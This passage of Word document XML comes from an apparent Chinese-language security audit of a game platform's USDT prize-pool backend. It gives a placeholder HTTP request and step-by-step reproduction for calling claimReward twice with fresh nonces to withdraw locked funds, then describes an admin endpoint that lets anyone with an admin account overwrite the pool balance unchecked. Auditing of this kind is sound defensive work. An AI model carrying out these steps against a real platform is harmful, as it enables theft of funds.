        <w:t>第二次请求（再获取剩余 50%，nonce 更换即可绕过防重放）：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/api/prize/claimReward HTTP/1.1</w:t>
              <w:br/>
              <w:t>Host: &lt;target&gt;</w:t>
              <w:br/>
              <w:t>Authorization: Bearer &lt;攻击者合法用户Token&gt;</w:t>
              <w:br/>
              <w:t>appKey: &lt;appKey&gt;</w:t>
              <w:br/>
              <w:t>timestamp: &lt;当前时间戳&gt;</w:t>
              <w:br/>
              <w:t>nonce: &lt;随机nonce_2&gt;</w:t>
              <w:br/>
              <w:t>sign: &lt;使用 nonce_2 计算的合法签名&gt;</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Content-Type: application/json</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820"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">使用已完成 KYC 认证且持有 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>completionStatus=1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Level 2 配置的账户登录，获取合法 Bearer Token</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="821"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>构造合法签名（appKey + appSecret 由客户端持有）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="822"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">发送第一次 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>POST /api/prize/claimReward</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 请求：响应返回当前可提现余额，约为 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>totalBalance × 50%</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">；此时账户 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>usdtUsableBalance</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 增加，但 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>useStatus</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 仍为 0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="823"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>在不提交任何提现申请的情况下</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">，立即使用新的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>nonce</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 发送第二次 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>POST /api/prize/claimReward</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 请求：由于 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>effectiveAlreadyCounted</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 仍为 0，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>stage2Theoretical</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 重新计算为 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>totalBalance × 50%</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">，继续从剩余 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>freezeBalance</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 中划转</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="824"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>经过两次调用，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>usdtUsableBalance</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 累计 = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>totalBalance × 100%</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">，而非平台设计的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>50%</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="825"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>用户即可提交提现申请，提取本应被锁定的全部资金</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p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="826"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">设计约束：Level 2 用户最多可提现 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>totalBalance</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 的 50%</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="827"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">实际结果：两次调用后，100% 资金转入 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>usdtUsableBalance</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，绕过锁定限制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82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829"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>权限级别：普通已登录用户（需完成注册 + KYC 认证 + 持有 completionStatus=1 的 Level 2 UsdtUserConfig 记录）；签名所需的 appKey/appSecret 通常随客户端 App 分发，攻击者可自行提取</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830"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>PrizePoolController.java.claimReward → PrizePoolService.java.claimReward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audit_m168_612_claimReward_ctrl-path1of2.md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：PrizePoolManageService.java#saveConfig</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:name="heading_38" w:id="38"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">漏洞37：奖池实时金额 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="true"/>
          <w:sz w:val="30"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>currentTotalAmount</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve"> 可被直接覆盖篡改，无任何合理性校验</w:t>
      </w:r>
      <w:bookmarkEnd w:id="38"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="831"/>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：奖池当前总金额可被直接覆盖（资金安全 — 直接金融状态篡改）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="832"/>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src/main/java/com/gameBack/mjservice/service/PrizePoolManageService.java:saveConfig</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="833"/>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业务逻辑绕过</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="834"/>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35"/>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：已认证管理员（任意角色级别的后台账号）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PrizePoolConfig</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 中存在两类语义截然不同的字段：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="836"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>配置类</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>（应由管理员主动设定）：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>initialAmount</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>seasonBaseAmount</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>enableLevel50Threshold</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>topCountShare</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>round3TopPercent</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>enableRound3Share</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="837"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>运行时金融状态</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>（应由游戏业务逻辑自动维护）：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>currentTotalAmount</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">然而 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>saveConfig</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 方法将 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>currentTotalAmount</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 与配置类字段完全等价对待，允许通过同一个 HTTP 入口直接覆盖写入。代码中对该字段的处理仅做空判断，无任何值域校验（无 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>&gt; 0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 检查、无上限约束、无负值保护）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>攻击者（或被攻陷的管理员账号）可通过单次 API 调用将奖池当前金额任意设置为：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="838"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>极大值</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：导致游戏系统认为奖池资金充足，触发超额奖励分发，造成实际资金损失</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="839"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>零或负值</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：导致合法用户无法正常领取奖励，实际资金与系统记录严重不符</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>此外，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>getOrCreateConfig()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 的初始化代码明确将 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>currentTotalAmount</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 设为 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>BigDecimal.ZERO</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，说明该字段设计意图为由游戏进程自动累积，而非配置项。将其暴露在通用配置保存接口中，违反了最小权限和职责分离原则，在任意管理员账号被攻击者控制的场景下将直接导致资金数据被篡改。</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840"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>POST /prizePoolManage/config/save</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 经 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>AdminAuthFilter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 认证，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
